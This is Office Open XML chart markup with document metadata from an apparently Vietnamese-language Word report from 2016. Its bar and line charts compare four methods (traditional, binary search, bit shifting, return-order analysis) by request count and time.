              <c:f>Sheet1!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Thời gian</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$5</c:f>
              <c:strCache>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>Truyền thống</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Tìm kiếm nhị phân</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Dịch bit</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Phân tích thứ tự trả về</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$D$2:$D$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>144</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>25</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>38</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>14</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-E9CD-42E1-BE12-D7595EBF7315}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:marker val="1"/>
        <c:smooth val="0"/>
        <c:axId val="240076672"/>
        <c:axId val="240102784"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="2400766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40102784"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2401027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00766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7</c:f>
              <c:strCache>
                <c:ptCount val="1"/>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B$8:$B$11</c:f>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-536C-4FE0-988A-2469A29DED40}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$C$7</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Số lượng yêu cầu</c:v>
                </c:pt>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C$8:$C$11</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>946</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>224</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>196</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>28</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-536C-4FE0-988A-2469A29DED40}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:axId val="244439296"/>
        <c:axId val="244646656"/>
      </c:barChart>
      <c:lineChart>
        <c:grouping val="standard"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$D$7</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Thời gian</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$8:$A$11</c:f>
              <c:strCache>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>Truyền thống</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Tìm kiếm nhị phân</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Dịch bit</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Phân tích thứ tự trả về</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$D$8:$D$11</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>2152</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>579</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>509</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>102</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000002-536C-4FE0-988A-2469A29DED40}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:marker val="1"/>
        <c:smooth val="0"/>
        <c:axId val="244439296"/>
        <c:axId val="244646656"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="244439296"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="0"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="244646656"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="244646656"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="2444392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CC16-A2FA-48A8-9977-1D585FD1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09</Pages>
  <Words>21673</Words>
  <Characters>12354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 Bach</dc:creator>
  <cp:lastModifiedBy>Nam Ha Bach</cp:lastModifiedBy>
  <cp:revision>807</cp:revision>
  <cp:lastPrinted>2016-08-29T14:11:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-05T01:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-08-29T14:54:00Z</dcterms:modified>
  <dc:language>en-US</dc:language>
</cp:coreProperties>
</file>